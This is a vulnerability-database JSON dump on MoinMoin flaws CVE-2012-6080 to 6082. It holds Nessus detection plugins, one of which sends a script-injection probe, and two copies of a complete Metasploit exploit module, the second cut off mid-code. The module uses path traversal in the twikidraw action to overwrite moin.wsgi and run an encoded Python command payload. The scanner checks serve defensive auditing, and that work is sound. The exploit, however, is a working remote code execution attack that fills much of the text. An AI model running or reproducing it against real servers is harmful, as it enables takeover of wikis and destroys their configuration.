1.9.3\nthrough 1.9.5 allows remote attackers to overwrite arbitrary files via\na .. (dot dot) in a file name.\n\nCross-site scripting (XSS) vulnerability in the rsslink function in\ntheme/__init__.py in MoinMoin 1.9.5 allows remote attackers to inject\narbitrary web script or HTML via the page name in a rss link.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\"\n );\n # https://vuxml.freebsd.org/freebsd/a264b1b0-5726-11e2-9483-14dae938ec40.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?87d7f17b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moinmoin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"moinmoin<1.9.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the 'page_name' parameter when creating\nan rss link. An attacker may be able to leverage this issue to inject\narbitrary HTML and script code into a user's browser to be executed\nwithin the security context of the affected site. \n\nNote that the application is also reportedly affected by a directory\ntraversal vulnerability (CVE-2012-6080) as well as a remote code\nexecution vulnerability (CVE-2012-6081). Nessus has not, however,\ntested for these additional issues.", "edition": 25, "published": "2013-02-28T00:00:00", "title": "MoinMoin rsslink() Function page_name Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-02-28T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_RSSLINK_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/64931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64931);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6082\");\n script_bugtraq_id(57089);\n\n script_name(english:\"MoinMoin rsslink() Function page_name Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server is affected by a cross-\nsite scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the 'page_name' parameter when creating\nan rss link. An attacker may be able to leverage this issue to inject\narbitrary HTML and script code into a user's browser to be executed\nwithin the security context of the affected site. \n\nNote that the application is also reportedly affected by a directory\ntraversal vulnerability (CVE-2012-6080) as well as a remote code\nexecution vulnerability (CVE-2012-6081). Nessus has not, however,\ntested for these additional issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\nxss_test = '\"><script>alert(\"' + (SCRIPT_NAME - \".nasl\") + '-' + unixtime() +\n '\")</script>';\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\" + xss_test,\n port : port,\n exit_on_fail : TRUE,\n fetch404 : TRUE\n);\n\nif (\n \">MoinMoin Powered</a>\" >< res[2] &&\n xss_test + '\" href=\"' >< res[2]\n)\n{\n output = extract_pattern_from_resp(string:res[2], pattern:'ST:'+xss_test);\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following URL :' +\n '\\n' +\n '\\n' + install_url + xss_test +\n '\\n';\n if (report_verbosity > 1)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report +=\n '\\n' + 'This produced the following response :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:09:08", "description": "According to its version number, the MoinMoin install hosted on the\nremote web server is affected by multiple vulnerabilities:\n\n - Versions 1.9.3 up to 1.9.5 are affected by a directory\n traversal vulnerability because the _do_attachment_move\n action in 'AttachFile.py' does not properly sanitize\n user-supplied input. This could allow an\n unauthenticated, remote attacker to upload and\n overwrite arbitrary files on the remote host.\n (CVE-2012-6080)\n\n - Versions 1.9.x up to 1.9.5 are affected by a remote\n code execution vulnerability because the 'twikidraw.py'\n action fails to properly sanitize user-supplied input.\n A remote, unauthenticated attacker could utilize a\n specially crafted request using directory traversal\n style characters to upload a file containing arbitrary\n code to the remote host. An attacker could then execute\n the code with the privileges of the user that runs the\n MoinMoin process. (CVE-2012-6081)\n\n - Version 1.9.5 is affected by a cross-site scripting\n (XSS) vulnerability because the application fails to\n properly sanitize user-supplied input in the 'page_name'\n parameter when creating an rss link. An attacker could\n leverage this issue to inject arbitrary HTML and script\n code into a user's browser to be executed within the\n security context of the affected site. (CVE-2012-6082)\n\n - Versions < 1.9.x are not maintained by MoinMoin\n developers and should be considered vulnerable.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2013-02-28T00:00:00", "title": "MoinMoin < 1.9.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-02-28T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_1_9_6.NASL", "href": "https://www.tenable.com/plugins/nessus/64930", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64930);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_bugtraq_id(\n 57076,\n 57082,\n 57089,\n 57147\n );\n\n script_name(english:\"MoinMoin < 1.9.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MoinMoin install hosted on the\nremote web server is affected by multiple vulnerabilities:\n\n - Versions 1.9.3 up to 1.9.5 are affected by a directory\n traversal vulnerability because the _do_attachment_move\n action in 'AttachFile.py' does not properly sanitize\n user-supplied input. This could allow an\n unauthenticated, remote attacker to upload and\n overwrite arbitrary files on the remote host.\n (CVE-2012-6080)\n\n - Versions 1.9.x up to 1.9.5 are affected by a remote\n code execution vulnerability because the 'twikidraw.py'\n action fails to properly sanitize user-supplied input.\n A remote, unauthenticated attacker could utilize a\n specially crafted request using directory traversal\n style characters to upload a file containing arbitrary\n code to the remote host. An attacker could then execute\n the code with the privileges of the user that runs the\n MoinMoin process. (CVE-2012-6081)\n\n - Version 1.9.5 is affected by a cross-site scripting\n (XSS) vulnerability because the application fails to\n properly sanitize user-supplied input in the 'page_name'\n parameter when creating an rss link. An attacker could\n leverage this issue to inject arbitrary HTML and script\n code into a user's browser to be executed within the\n security context of the affected site. (CVE-2012-6082)\n\n - Versions < 1.9.x are not maintained by MoinMoin\n developers and should be considered vulnerable.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-6080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_require_keys(\"www/moinmoin\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\nversion = install[\"ver\"];\ninstall_url = build_url(qs:dir, port:port);\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"MoinMoin\", install_url);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions less than 1.9.6 are vulnerable\n# http://moinmo.in/SecurityFixes notes that versions < 1.9.x are no longer\n# maintained and should be considered vulnerable\nif (\n ver[0] < 1 ||\n (ver[0] == 1 && ver[1] < 9) ||\n (ver[0] == 1 && ver[1] == 9 && ver[2] < 6)\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 1.9.6\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url, version);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:19", "description": "", "published": "2013-06-19T00:00:00", "type": "packetstorm", "title": "MoinMoin twikidraw Action Traversal File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6081"], "modified": "2013-06-19T00:00:00", "id": "PACKETSTORM:122079", "href": "https://packetstormsecurity.com/files/122079/MoinMoin-twikidraw-Action-Traversal-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MoinMoin twikidraw Action Traversal File Upload', \n'Description' => %q{ \nThis module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability \nexists on the manage of the twikidraw actions, where a traversal path can be used \nin order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi \nconfigurations by overwriting moin.wsgi, which allows to execute arbitrary python \ncode, as exploited in the wild on July, 2012. The user is warned to use this module \nat his own risk since it's going to overwrite the moin.wsgi file, required for the \ncorrect working of the MoinMoin wiki. While the exploit will try to restore the \nattacked application at post exploitation, correct working after all isn't granted. \n}, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'HTP', # PoC \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-6081' ], \n[ 'OSVDB', '88825' ], \n[ 'BID', '57082' ], \n[ 'EDB', '25304' ], \n[ 'URL', 'http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f' ], \n[ 'URL', 'http://wiki.python.org/moin/WikiAttack2013' ] \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 16384, # Enough one to fit any payload \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic telnet netcat perl' \n} \n}, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'MoinMoin 1.9.5', { }]], \n'DisclosureDate' => 'Dec 30 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"MoinMoin base path\", \"/\" ]), \nOptString.new('WritablePage', [ true, \"MoinMoin Page with edit permissions to inject the payload, by default WikiSandbox (Ex: /WikiSandbox)\", \"/WikiSandBox\" ]), \nOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]), \nOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ]) \n], self.class) \nend \n \ndef moinmoin_template(path) \ntemplate =[] \ntemplate << \"# -*- coding: iso-8859-1 -*-\" \ntemplate << \"import sys, os\" \ntemplate << \"sys.path.insert(0, 'PATH')\".gsub(/PATH/, File.dirname(path)) \ntemplate << \"from MoinMoin.web.serving import make_application\" \ntemplate << \"application = make_application(shared=True)\" \nreturn template \nend \n \ndef restore_file(session, file, contents) \nfirst = true \ncontents.each {|line| \nif first \nsession.shell_command_token(\"echo \\\"#{line}\\\" > #{file}\") \nfirst = false \nelse \nsession.shell_command_token(\"echo \\\"#{line}\\\" >> #{file}\") \nend \n} \nend \n \n# Try to restore a basic moin.wsgi file with the hope of making the \n# application usable again. \n# Try to search on /usr/local/share/moin (default search path) and the \n# current path (apache user home). Avoiding to search on \"/\" because it \n# could took long time to finish. \ndef on_new_session(session) \nprint_status(\"Trying to restore moin.wsgi...\") \nbegin \nfiles = session.shell_command_token(\"find `pwd` -name moin.wsgi 2> /dev/null\") \nfiles.split.each { |file| \nprint_status(\"#{file} found! Trying to restore...\") \nrestore_file(session, file, moinmoin_template(file)) \n} \n \nfiles = session.shell_command_token(\"find /usr/local/share/moin -name moin.wsgi 2> /dev/null\") \nfiles.split.each { |file| \nprint_status(\"#{file} found! Trying to restore...\") \nrestore_file(session, file, moinmoin_template(file)) \n} \nprint_warning(\"Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.\") \nrescue \nprint_warning(\"Error while restring moin.wsgi, manual restoring would be required.\") \nend \nend \n \ndef do_login(username, password) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(@base, @page), \n'vars_post' => \n{ \n'action' => 'login', \n'name' => username, \n'password' => password, \n'login' => 'Login' \n} \n}) \n \nif not res or res.code != 200 or not res.headers.include?('Set-Cookie') \nreturn nil \nend \n \nreturn res.get_cookies \n \nend \n \ndef upload_code(session, code) \n \nvprint_status(\"Retrieving the ticket...\") \n \nres = send_request_cgi({ \n'uri' => normalize_uri(@base, @page), \n'cookie' => session, \n'vars_get' => { \n'action' => 'twikidraw', \n'do' => 'modify', \n'target' => '../../../../moin.wsgi' \n} \n}) \n \nif not res or res.code != 200 or res.body !~ /ticket=(.*?)&target/ \nvprint_error(\"Error retrieving the ticket\") \nreturn nil \nend \n \nticket = $1 \nvprint_good(\"Ticket found: #{ticket}\") \n \nmy_payload = \"[MARK]#{code}[MARK]\" \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"drawing.r if()else[]\\nexec eval(\\\"open(__file__)\\\\56read()\\\\56split('[MARK]')[-2]\\\\56strip('\\\\\\\\0')\\\")\", nil, nil, \"form-data; name=\\\"filename\\\"\") \npost_data.add_part(my_payload, \"image/png\", nil, \"form-data; name=\\\"filepath\\\"; filename=\\\"drawing.png\\\"\") \nmy_data = post_data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(@base, @page), \n'cookie' => session, \n'vars_get' => \n{ \n'action' => 'twikidraw', \n'do' => 'save', \n'ticket' => ticket, \n'target' => '../../../../moin.wsgi' \n}, \n'data' => my_data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \n \nif not res or res.code != 200 or not res.body.empty? \nvprint_error(\"Error uploading the payload\") \nreturn nil \nend \n \nreturn true \nend \n \ndef check \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \nres = send_request_cgi({ \n'uri' => normalize_uri(@base) \n}) \n \nif res and res.code == 200 and res.body =~ /moinmoin/i and res.headers['Server'] =~ /Apache/ \nreturn Exploit::CheckCode::Detected \nelsif res \nreturn Exploit::CheckCode::Unknown \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef writable_page?(session) \n \nres = send_request_cgi({ \n'uri' => normalize_uri(@base, @page), \n'cookie' => session, \n}) \n \nif not res or res.code != 200 or res.body !~ /Edit \\(Text\\)/ \nreturn false \nend \n \nreturn true \nend \n \n \ndef exploit \n \n# Init variables \n@page = datastore['WritablePage'] \n \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \n# Login if needed \nif (datastore['USERNAME'] and \nnot datastore['USERNAME'].empty? and \ndatastore['PASSWORD'] and \nnot datastore['PASSWORD'].empty?) \nprint_status(\"Trying login to get session ID...\") \nsession = do_login(datastore['USERNAME'], datastore['PASSWORD']) \nelse \nprint_status(\"Using anonymous access...\") \nsession = \"\" \nend \n \n# Check authentication \nif not session \nfail_with(Exploit::Failure::NoAccess, \"Error getting a session ID, check credentials or WritablePage option\") \nend \n \n# Check writable permissions \nif not writable_page?(session) \nfail_with(Exploit::Failure::NoAccess, \"There are no write permissions on #{@page}\") \nend \n \n# Upload payload \nprint_status(\"Trying to upload payload...\") \npython_cmd = \"import os\\nos.system(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\".decode(\\\"base64\\\"))\" \nres = upload_code(session, \"exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))\") \nif not res \nfail_with(Exploit::Failure::Unknown, \"Error uploading the payload\") \nend \n \n# Execute payload \nprint_status(\"Executing the payload...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(@base, @page), \n'cookie' => session, \n'vars_get' => { \n'action' => 'AttachFile' \n} \n}, 5) \n \nend \n \nend \n \n \n`\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122079/moinmoin_twikidraw.rb.txt"}], "zdt": [{"lastseen": "2018-03-17T03:12:24", "description": "This Metasploit module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability exists on the manage of the twikidraw actions, where a traversal path can be used in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi configurations by overwriting moin.wsgi, which allows to execute arbitrary python code, as exploited in the wild on July, 2012.", "edition": 2, "published": "2013-06-19T00:00:00", "type": "zdt", "title": "MoinMoin twikidraw Action Traversal File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6081"], "modified": "2013-06-19T00:00:00", "id": "1337DAY-ID-20906", "href": "https://0day.today/exploit/description/20906", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MoinMoin twikidraw Action Traversal File Upload',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability\r\n exists on the manage of the twikidraw actions, where a traversal path can be used\r\n in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi\r\n configurations by overwriting moin.wsgi, which allows to execute arbitrary python\r\n code, as exploited in the wild on July, 2012. The user is warned to use this module\r\n at his own risk since it's going to overwrite the moin.wsgi file, required for the\r\n correct working of the MoinMoin wiki. While the exploit will try to restore the\r\n attacked application at post exploitation, correct working after all isn't granted.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery\r\n 'HTP', # PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-6081' ],\r\n [ 'OSVDB', '88825' ],\r\n [ 'BID', '57082' ],\r\n [ 'EDB', '25304' ],\r\n [ 'URL', 'http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f' ],\r\n [ 'URL', 'http://wiki.python.org/moin/WikiAttack2013' ]\r\n ],\r\n 'Privileged' => false, # web server context\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 16384, # Enough one to fit any payload\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet netcat perl'\r\n }\r\n },\r\n 'Platform' => [ 'unix' ],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'MoinMoin 1.9.5', { }]],\r\n 'DisclosureDate' => 'Dec 30 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"MoinMoin base path\", \"/\" ]),\r\n OptString.new('WritablePage', [ true, \"MoinMoin Page with edit permissions to inject the payload, by default WikiSandbox (Ex: /WikiSandbox)\", \"/WikiSandBox\" ]),\r\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n ], self.class)\r\n end\r\n\r\n def moinmoin_template(path)\r\n template =[]\r\n template << \"# -*- coding: iso-8859-1 -*-\"\r\n template << \"import sys, os\"\r\n template << \"sys.path.insert(0, 'PATH')\".gsub(/PATH/, File.dirname(path))\r\n template << \"from MoinMoin.web.serving import make_application\"\r\n template << \"application = make_application(shared=True)\"\r\n return template\r\n end\r\n\r\n def restore_file(session, file, contents)\r\n first = true\r\n contents.each {|line|\r\n if first\r\n session.shell_command_token(\"echo \\\"#{line}\\\" > #{file}\")\r\n first = false\r\n else\r\n session.shell_command_token(\"echo \\\"#{line}\\\" >> #{file}\")\r\n end\r\n }\r\n end\r\n\r\n # Try to restore a basic moin.wsgi file with the hope of making the\r\n # application usable again.\r\n # Try to search on /usr/local/share/moin (default search path) and the\r\n # current path (apache user home). Avoiding to search on \"/\" because it\r\n # could took long time to finish.\r\n def on_new_session(session)\r\n print_status(\"Trying to restore moin.wsgi...\")\r\n begin\r\n files = session.shell_command_token(\"find `pwd` -name moin.wsgi 2> /dev/null\")\r\n files.split.each { |file|\r\n print_status(\"#{file} found! Trying to restore...\")\r\n restore_file(session, file, moinmoin_template(file))\r\n }\r\n\r\n files = session.shell_command_token(\"find /usr/local/share/moin -name moin.wsgi 2> /dev/null\")\r\n files.split.each { |file|\r\n print_status(\"#{file} found! Trying to restore...\")\r\n restore_file(session, file, moinmoin_template(file))\r\n }\r\n print_warning(\"Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.\")\r\n rescue\r\n print_warning(\"Error while restring moin.wsgi, manual restoring would be required.\")\r\n end\r\n end\r\n\r\n def do_login(username, password)\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(@base, @page),\r\n 'vars_post' =>\r\n {\r\n 'action' => 'login',\r\n 'name' => username,\r\n 'password' => password,\r\n 'login' => 'Login'\r\n }\r\n })\r\n\r\n if not res or res.code != 200 or not res.headers.include?('Set-Cookie')\r\n return nil\r\n end\r\n\r\n return res.get_cookies\r\n\r\n end\r\n\r\n def upload_code(session, code)\r\n\r\n vprint_status(\"Retrieving the ticket...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n 'vars_get' => {\r\n 'action' => 'twikidraw',\r\n 'do' => 'modify',\r\n 'target' => '../../../../moin.wsgi'\r\n }\r\n })\r\n\r\n if not res or res.code != 200 or res.body !~ /ticket=(.*?)&target/\r\n vprint_error(\"Error retrieving the ticket\")\r\n return nil\r\n end\r\n\r\n ticket = $1\r\n vprint_good(\"Ticket found: #{ticket}\")\r\n\r\n my_payload = \"[MARK]#{code}[MARK]\"\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(\"drawing.r if()else[]\\nexec eval(\\\"open(__file__)\\\\56read()\\\\56split('[MARK]')[-2]\\\\56strip('\\\\\\\\0')\\\")\", nil, nil, \"form-data; name=\\\"filename\\\"\")\r\n post_data.add_part(my_payload, \"image/png\", nil, \"form-data; name=\\\"filepath\\\"; filename=\\\"drawing.png\\\"\")\r\n my_data = 